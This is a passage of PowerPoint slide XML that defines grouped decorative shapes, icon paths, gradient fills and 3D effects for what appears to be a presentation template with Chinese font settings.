                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
